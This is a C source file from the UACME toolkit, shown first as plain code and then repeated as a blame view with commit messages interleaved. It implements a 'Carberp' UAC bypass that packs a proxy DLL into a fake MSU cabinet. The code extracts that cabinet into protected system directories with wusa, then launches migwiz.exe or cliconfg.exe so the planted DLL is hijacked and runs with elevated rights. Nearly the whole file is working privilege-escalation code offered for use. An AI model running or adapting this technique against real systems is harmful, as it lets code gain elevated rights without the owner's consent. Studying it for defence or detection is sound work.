UACME/Source/Akagi/methods/carberp.c

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2018
*
*  TITLE:       CARBERP.C
*
*  VERSION:     2.87
*
*  DATE:        19 Jan 2018
*
*  Tweaked Carberp methods.
*  Original Carberp is exploiting mcx2prov.exe in ehome.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"

/*
* ucmWusaMethod
*
* Purpose:
*
* Build and install fake msu package then run target application.
*
* Fixed in Windows 10 TH1
*
*/
BOOL ucmWusaMethod(
    _In_ UCM_METHOD Method,
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    BOOL   bResult = FALSE;
    WCHAR  szSourceDll[MAX_PATH * 2];
    WCHAR  szTargetProcess[MAX_PATH * 2];
    WCHAR  szTargetDirectory[MAX_PATH * 2];

    _strcpy(szTargetProcess, g_ctx.szSystemDirectory);
    _strcpy(szTargetDirectory, g_ctx.szSystemDirectory);
    _strcpy(szSourceDll, g_ctx.szTempDirectory);

    switch (Method) {

    // 
    // Use migwiz.exe as target.
    // szTargetDirectory is system32\migwiz
    //
    case UacMethodCarberp1:
        _strcat(szSourceDll, WDSCORE_DLL);
        _strcat(szTargetDirectory, MIGWIZ_DIR);
        _strcat(szTargetProcess, MIGWIZ_DIR);
        _strcat(szTargetProcess, MIGWIZ_EXE);
        break;

    //
    // Use cliconfg.exe as target.
    // szTargetDirectory is system32
    //
    case UacMethodCarberp2:
        _strcat(szSourceDll, NTWDBLIB_DLL);
        _strcat(szTargetProcess, CLICONFG_EXE);
        break;

    default:
        return FALSE;
    }

    if (!PathFileExists(szTargetProcess)) {
        supDebugPrint(TEXT("ucmWusaMethod"), ERROR_FILE_NOT_FOUND);
        return FALSE;
    }

    //
    // Extract file to the protected directory
    // First, create cab with fake msu ext, second run fusion process.
    //
    if (ucmCreateCabinetForSingleFile(
        szSourceDll,
        ProxyDll,
        ProxyDllSize,
        NULL))
    {

        if (ucmWusaExtractPackage(szTargetDirectory)) {
            //run target process for dll hijacking
            bResult = supRunProcess(szTargetProcess, NULL);
        }
        ucmWusaCabinetCleanup();
    }

    return bResult;
}
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`/*******************************************************************************`
			`*`
Updates (Feb 8) Yuubari updated to work with Windows 10 RS4 changes, uacme readme.md file updated to include routine names for each method, ntsxs updated to recent version. 2018-02-09 07:12:27 +00:00			`* (C) COPYRIGHT AUTHORS, 2014 - 2018`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`*`
			`* TITLE: CARBERP.C`
			`*`
Updates (Feb 8) Yuubari updated to work with Windows 10 RS4 changes, uacme readme.md file updated to include routine names for each method, ntsxs updated to recent version. 2018-02-09 07:12:27 +00:00			`* VERSION: 2.87`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`*`
Updates (Feb 8) Yuubari updated to work with Windows 10 RS4 changes, uacme readme.md file updated to include routine names for each method, ntsxs updated to recent version. 2018-02-09 07:12:27 +00:00			`* DATE: 19 Jan 2018`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`*`
v 1.3.0 Win32/Carberp method tweaked again to work from Windows 7 up to Windows 10 b10041. 2015-03-30 07:03:39 +00:00			`* Tweaked Carberp methods.`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`* Original Carberp is exploiting mcx2prov.exe in ehome.`
			`*`
			`* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF`
			`* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED`
			`* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A`
			`* PARTICULAR PURPOSE.`
			`*`
			`*******************************************************************************/`
			`#include "global.h"`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00
			`/*`
			`* ucmWusaMethod`
			`*`
			`* Purpose:`
			`*`
			`* Build and install fake msu package then run target application.`
			`*`
Updates (Feb 8) Yuubari updated to work with Windows 10 RS4 changes, uacme readme.md file updated to include routine names for each method, ntsxs updated to recent version. 2018-02-09 07:12:27 +00:00			`* Fixed in Windows 10 TH1`
			`*`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`*/`
			`BOOL ucmWusaMethod(`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`_In_ UCM_METHOD Method,`
v 2.8.5 Some internal rearrange. 2017-12-17 03:58:48 +00:00			`_In_ PVOID ProxyDll,`
			`_In_ DWORD ProxyDllSize`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`)`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`{`
v 2.7.5 Method 37 added, readme updated. 2017-06-30 05:59:47 +00:00			`BOOL bResult = FALSE;`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`WCHAR szSourceDll[MAX_PATH * 2];`
			`WCHAR szTargetProcess[MAX_PATH * 2];`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`WCHAR szTargetDirectory[MAX_PATH * 2];`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00
			`_strcpy(szTargetProcess, g_ctx.szSystemDirectory);`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`_strcpy(szTargetDirectory, g_ctx.szSystemDirectory);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`_strcpy(szSourceDll, g_ctx.szTempDirectory);`

			`switch (Method) {`

v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`//`
			`// Use migwiz.exe as target.`
			`// szTargetDirectory is system32\migwiz`
			`//`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`case UacMethodCarberp1:`
			`_strcat(szSourceDll, WDSCORE_DLL);`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`_strcat(szTargetDirectory, MIGWIZ_DIR);`
v 2.2.0 method 18 added 2016-05-29 08:05:10 +00:00			`_strcat(szTargetProcess, MIGWIZ_DIR);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`_strcat(szTargetProcess, MIGWIZ_EXE);`
			`break;`

v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`//`
			`// Use cliconfg.exe as target.`
			`// szTargetDirectory is system32`
			`//`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`case UacMethodCarberp2:`
v 2.8.5 Some internal rearrange. 2017-12-17 03:58:48 +00:00			`_strcat(szSourceDll, NTWDBLIB_DLL);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`_strcat(szTargetProcess, CLICONFG_EXE);`
			`break;`

			`default:`
			`return FALSE;`
			`}`

			`if (!PathFileExists(szTargetProcess)) {`
v 2.5.6 Kongou removed from main executable, see ucmGWX function description for more info, made Yuubari module public, rearranged readme file. 2017-02-19 05:48:36 +00:00			`supDebugPrint(TEXT("ucmWusaMethod"), ERROR_FILE_NOT_FOUND);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`return FALSE;`
			`}`

v 2.7.5 Method 37 added, readme updated. 2017-06-30 05:59:47 +00:00			`//`
			`// Extract file to the protected directory`
			`// First, create cab with fake msu ext, second run fusion process.`
			`//`
			`if (ucmCreateCabinetForSingleFile(`
v 2.8.5 Some internal rearrange. 2017-12-17 03:58:48 +00:00			`szSourceDll,`
			`ProxyDll,`
			`ProxyDllSize,`
			`NULL))`
v 2.7.5 Method 37 added, readme updated. 2017-06-30 05:59:47 +00:00			`{`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00
v 2.7.5 Method 37 added, readme updated. 2017-06-30 05:59:47 +00:00			`if (ucmWusaExtractPackage(szTargetDirectory)) {`
			`//run target process for dll hijacking`
			`bResult = supRunProcess(szTargetProcess, NULL);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`}`
v 2.7.5 Method 37 added, readme updated. 2017-06-30 05:59:47 +00:00			`ucmWusaCabinetCleanup();`
			`}`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00
			`return bResult;`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`}`